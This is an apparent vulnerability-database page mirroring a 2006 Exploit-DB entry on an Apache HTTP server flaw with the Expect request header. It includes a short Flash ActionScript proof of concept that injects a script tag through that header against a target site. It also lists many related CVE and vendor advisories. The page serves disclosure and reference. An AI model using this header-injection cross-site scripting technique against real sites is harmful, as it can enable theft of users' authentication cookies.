Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbThiago ZaninottiEDB-ID:28424
HistoryAug 24, 2006 - 12:00 a.m.

Apache 1.3.35/2.0.58/2.2.2 - Arbitrary HTTP Request Headers Security

2006-08-2400:00:00
Thiago Zaninotti
www.exploit-db.com
133

AI Score

7.4

Confidence

Low

JSON
source: https://www.securityfocus.com/bid/19661/info

Apache HTTP server is prone to a security weakness related to HTTP request headers.

An attacker may exploit this issue to steal cookie-based authentication credentials and launch other attacks.

var req:LoadVars=new LoadVars();
req.addRequestHeader("Expect",
"<script>alert('gotcha!')</script>");
req.send("http://www.target.site/","_blank","GET");

Related

f5 2
nessus 12
ubuntucve 2
httpd 1
debiancve 2
oraclelinux 1
redhat 2
nvd 3
cve 3
centos 3
cvelist 3
packetstorm 2
checkpoint_advisories 1
exploitpack 1
osv 1
prion 2
openvas 13
debian 1
exploitdb 1
zdt 1
seebug 1
suse 2
ubuntu 1
f5
f5
K6669 : Apache HTTP Expect header handling
2013-03-19 00:00:00
SOL6669 - Apache HTTP Expect header handling
2007-05-16 00:00:00
nessus
nessus
Oracle Linux 3 / 4 : httpd (ELSA-2006-0619)
2013-07-12 00:00:00
RHEL 3 / 4 : httpd (RHSA-2006:0619)
2006-08-14 00:00:00
F5 Networks BIG-IP : Apache HTTP Expect header handling (SOL6669)
2014-10-10 00:00:00
ubuntucve
ubuntucve
CVE-2006-3918
2006-07-27 00:00:00
CVE-2007-6203
2007-12-03 00:00:00
httpd
httpd
Apache Httpd < 1.3.35 : Expect header Cross-Site Scripting
2006-05-01 00:00:00
debiancve
debiancve
CVE-2006-3918
2006-07-28 00:04:00
CVE-2007-6203
2007-12-03 22:46:00
oraclelinux
oraclelinux
Moderate httpd security update
2006-11-30 00:00:00
redhat
redhat
(RHSA-2006:0619) httpd security update
2006-08-10 00:00:00
(RHSA-2006:0618) apache security update
2006-08-08 00:00:00
nvd
nvd
CVE-2006-3918
2006-07-28 00:04:00
CVE-2007-6203
2007-12-03 22:46:00
CVE-2007-5944
2007-11-14 01:46:00
cve
cve
CVE-2006-3918
2006-07-28 00:04:00
CVE-2007-6203
2007-12-03 22:46:00
CVE-2007-5944
2007-11-14 01:46:00
centos
centos
httpd, mod_ssl security update
2006-08-10 22:42:31
httpd, mod_ssl security update
2006-08-24 16:29:11
apache security update
2006-08-08 23:33:33
cvelist
cvelist
CVE-2006-3918
2006-07-28 00:00:00
CVE-2007-6203
2007-12-03 22:00:00
CVE-2007-5944
2007-11-14 01:00:00
packetstorm
packetstorm
ProCheckUp Security Advisory 2007.37
2007-12-02 00:00:00
Oracle HTTP Server Header Cross Site Scripting
2011-06-14 00:00:00
checkpoint_advisories
checkpoint_advisories
Apache HTTP Server Header Injection Cross-Site Scripting (CVE-2006-3918)
2014-03-17 00:00:00
exploitpack
exploitpack
Oracle HTTP Server - Cross-Site Scripting Header Injection
2011-06-13 00:00:00
osv
osv
apache - missing input sanitising
2006-09-04 00:00:00
prion
prion
Cross site scripting
2007-12-03 22:46:00
Cross site scripting
2007-11-14 01:46:00
openvas
openvas
Debian Security Advisory DSA 1167-1 (apache)
2008-01-17 00:00:00
Debian: Security Advisory (DSA-1167-1)
2008-01-17 00:00:00
SLES9: Security update for apache2,apache2-prefork,apache2-worker
2009-10-10 00:00:00
debian
debian
[SECURITY] [DSA 1167-1] New apache packages fix several vulnerabilities
2006-09-04 15:08:06
exploitdb
exploitdb
Oracle HTTP Server - Cross-Site Scripting Header Injection
2011-06-13 00:00:00
zdt
zdt
Oracle HTTP Server XSS Header Injection
2011-06-12 00:00:00
seebug
seebug
Oracle HTTP Server - XSS Header Injection
2014-07-01 00:00:00
suse
suse
cryptographic problems in apache2
2006-09-08 14:34:17
cross site scripting in apache2,apache
2008-04-04 16:29:16
ubuntu
ubuntu
Apache vulnerabilities
2008-02-04 00:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:28424
f52nessus12ubuntucve2httpd1debiancve2oraclelinux1redhat2nvd3cve3centos3cvelist3packetstorm2checkpoint_advisories1exploitpack1osv1prion2openvas13debian1exploitdb1zdt1seebug1suse2ubuntu1